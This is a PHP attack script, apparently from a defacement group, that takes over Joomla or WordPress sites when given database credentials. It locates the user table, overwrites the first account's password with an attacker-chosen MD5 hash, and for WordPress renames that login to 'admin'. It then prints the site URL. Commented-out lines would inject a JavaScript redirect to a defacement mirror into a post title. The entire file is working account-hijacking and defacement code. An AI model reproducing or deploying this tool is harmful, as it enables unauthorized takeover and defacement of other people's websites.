@query.php

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
  <title>Exploit query 2011 #</title>
</head>
<style type="text/css">
body{
  background: #333333;
  color: #fff;
  font-family: Consolas;
  font-size: 13px;

}
.text {
  background: #fff;
  color: #000;
}
.text:hover {
  background: #FFFFCC;
}

.submit {
  background: #333330;
  padding: 2px;
  margin: 0px;
  color: #fff;
  border: thick;
}
.submit:hover {
  background: #555;
}

</style>
<body>
<center><h2># Mysql Query #</h2>
<form action="" method="post">
host : <input type="text" value="localhost" name="localhost" class="text" />&nbsp;&nbsp;
db&nbsp;&nbsp;:&nbsp; <input type="text" name="db" class="text" /><br />
user : <input type="text" name="userdb" class="text" /> &nbsp; pass : <input type="text" name="passdb" class="text" /><br />  <br />What password ! : <input type="text" name="mdpass"  class="text" /><br />
joomla : <input type="radio" value="1"  name="ch1" /> wordpress: <input type="radio" value="2" name="ch1" /> <br />   <br />

<input type="submit" name ="go" value="#- Done -#" class="submit" />


</form>

</center>
<?

$host = $_POST['locch1alhost'];
$dbname = $_POST['db'];
$dbuser = $_POST['userdb'];
$dbpass = $_POST['passdb'];
$kolk = md5($_POST['mdpass']);
if ($_POST['ch1'] == 1) {


    $connect = mysql_connect($host,$dbuser,$dbpass) or die ("Soory Not Login the database");
    $selectdb = mysql_select_db($dbname,$connect);

    $cyber = mysql_query('select concat(table_name,0x3a,column_name,0x3a,table_schema) from information_schema.columns where column_name LIKE "%pas%"');
    $show = mysql_fetch_array($cyber);
    $defg = $show[0];
    $imp = explode(':',$defg);
    $ar = $imp[0];

    $conar = mysql_query("SELECT * FROM $ar");
    $showar = mysql_fetch_array($conar);

    ################# set
    $setar = mysql_query("UPDATE $ar SET password='".$kolk."' WHERE id = '".$showar[0]."' ");
    echo $setar;
    echo "user name is -> $showar[2]";
} else if ($_POST['ch1'] == '2') {

    $connect = mysql_connect($host,$dbuser,$dbpass) or die ("Soory Not Login the database");
    $selectdb = mysql_select_db($dbname,$connect);

    $cyber = mysql_query('select concat(table_name,0x3a,column_name,0x3a,table_schema) from information_schema.columns where column_name LIKE "%user_pass%"');
    $show = mysql_fetch_array($cyber);
    $defg = $show[0];
    $imp = explode(':',$defg);
    $ar = $imp[0];

    $conar = mysql_query("SELECT * FROM $ar");
    $showar = mysql_fetch_array($conar);

    ################# set
    $setar = mysql_query("UPDATE $ar SET user_pass='".$kolk."' WHERE id = '".$showar[0]."' ");
    $setar .= mysql_query("UPDATE $ar SET user_login='admin' WHERE id = '".$showar[0]."' ");
    echo $setar;
    echo "user name is -> $showar[1]"."<br />";
    #$qurl = mysql_query("select guid from wp_posts");
    #$scr = "<script>document.location='http://zonehmirrors.net/defaced/2011/10/07/ecocolourchembd.com'</script>";
    #$indq = mysql_query('UPDATE wp_posts SET post_title="'.$scr.'" WHERE id =1');
        #$indexar = mysql_fetch_array($indq);
    #$qin = mysql_query("select post_title from wp_posts where id =1");
    #$rqin = mysql_fetch_array($qin);
   # echo  htmlspecialchars("$rqin[0]");
        $q = mysql_query("select * from wp_options where option_id='1' or option_name='home'");
        while($wos = mysql_fetch_object($q)){
            if ($wos){
        echo "URL : ~>  ".$wos->option_value."<br>";
        }}
        }
?>
</body>
<br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br />
<center><b>Meked By Cyber-Crystal </b></center>
</html>